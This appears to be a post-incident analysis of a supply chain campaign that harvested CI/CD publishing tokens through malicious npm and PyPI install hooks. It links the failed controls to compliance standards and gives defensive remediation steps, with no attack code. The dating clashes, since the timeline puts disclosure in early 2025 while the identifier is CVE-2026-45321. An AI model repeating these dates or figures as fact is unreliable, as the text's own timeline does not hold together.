What Happened
Between late 2024 and early 2025, threat actor TeamPCP executed a supply chain attack that compromised over 170 npm and PyPI packages with more than 518 million downloads. The attack, assigned CVE-2026-45321 with a CVSS score of 9.6, targeted prominent projects including TanStack, Mistral AI, and Guardrails AI.
TeamPCP focused on stealing credentials from CI/CD pipelines rather than injecting malicious code directly into libraries. The malicious packages executed during installation and build processes, exfiltrating GitHub tokens, npm tokens, and environment variables. With these credentials, attackers published new malicious versions of legitimate packages through compromised accounts.
The attack's sophistication lies in its propagation model: automating credential theft to gain persistent publishing access across multiple ecosystems.
Timeline
Initial Compromise (Late 2024): TeamPCP began distributing malicious packages designed to execute during npm install and build phases, targeting developer workstations and CI/CD runners.
Credential Exfiltration (Late 2024 - Early 2025): Malicious code harvested GitHub Actions tokens, npm publishing credentials, and PyPI tokens from environment variables during automated builds.
Lateral Movement (Early 2025): Using stolen credentials, attackers published malicious versions of legitimate packages, including those maintained by TanStack and other high-profile projects.
Detection and Disclosure (Early 2025): Security researchers identified the campaign and assigned CVE-2026-45321. Affected maintainers began rotating credentials and publishing clean package versions.
Which Controls Failed or Were Missing
Secrets Management in CI/CD: GitHub Actions workflows exposed publishing tokens as environment variables accessible to arbitrary code during build and install phases. The workflows lacked isolation between untrusted dependency code and sensitive credentials.
Dependency Integrity Verification: Build processes executed code from newly installed dependencies without runtime behavioral monitoring. There was no mechanism to detect outbound network connections during package installation.
Least Privilege for Publishing Tokens: npm and PyPI publishing tokens granted broad, long-lived access to publish any version of any package the account maintained. The tokens weren't scoped to specific packages or time windows.
Behavioral Anomaly Detection: No monitoring flagged unusual network activity during npm install or pip install operations. Outbound connections to attacker-controlled endpoints went undetected.
Supply Chain Verification: Automated dependency updates didn't validate package behavior before merging. There was no pre-publication review of dependency changes.
What the Relevant Standards Require
NIST 800-53 Rev 5 SA-10 (Developer Configuration Management): Requires protecting the integrity of changes to the system and implementing configuration management for organizational systems. The compromised CI/CD workflows violated this by allowing untrusted code execution with access to publishing credentials.
NIST 800-53 Rev 5 SR-3 (Supply Chain Controls and Processes): Mandates processes to identify and address weaknesses or deficiencies in the supply chain. The lack of behavioral monitoring during dependency installation represents a gap in supply chain visibility.
ISO/IEC 27001:2022 Annex A.8.31 (Separation of Development, Testing and Production Environments): Requires separation between environments to reduce unauthorized access risks. CI/CD pipelines that expose production publishing credentials to development-time dependency code violate this separation.
PCI DSS v4.0.1 Requirement 6.3.2: States that security of bespoke and custom software and components developed by or for the entity is managed throughout the software development lifecycle. The attack exploited the gap between dependency acquisition and production deployment.
SOC 2 CC6.6 (Logical and Physical Access Controls): Requires restricting logical access to information assets. Long-lived, broadly-scoped publishing tokens fail this requirement by not implementing time-based or scope-based restrictions.
Lessons and Action Items for Your Team
Isolate secrets from dependency execution. Move publishing tokens out of the build environment. Use OpenID Connect (OIDC) federation with npm and PyPI instead of long-lived tokens. Configure GitHub Actions to authenticate directly to package registries using workload identity, eliminating the need for stored credentials.
Implement runtime behavioral monitoring. Deploy tools that detect network connections during npm install, pip install, and build phases. Flag any outbound connections to unexpected domains. Consider using isolated build environments (containers or VMs) with network egress logging.
Scope publishing credentials. Use granular automation tokens that restrict publishing to specific packages. Set short expiration windows (hours, not months). Rotate tokens after each release if your registry supports it.
Add pre-publication gates. Before merging dependency updates, run them in an isolated environment with network monitoring. Review dependency diffs for suspicious post-install scripts. Use tools like npm audit signatures to verify publisher identity.
Monitor package behavior changes. Track when dependencies add new network calls, file system access, or process execution. Tools like Socket Security or Phylum can detect behavioral changes between versions.
Separate build and publish workflows. Don't grant the same pipeline both the ability to install arbitrary dependencies and publish to production registries. Use a two-stage process: build in an untrusted environment, then transfer artifacts to a trusted publishing environment.
Audit your GitHub Actions workflows. Review every workflow file for environment variables containing tokens. Search for secrets.NPM_TOKEN, secrets.PYPI_TOKEN, or similar patterns. Replace them with OIDC authentication.
The TanStack compromise demonstrates that supply chain attacks have evolved beyond simple package tampering. Your CI/CD infrastructure is now the target. Address credential exposure in your build pipelines before an attacker does it for you.
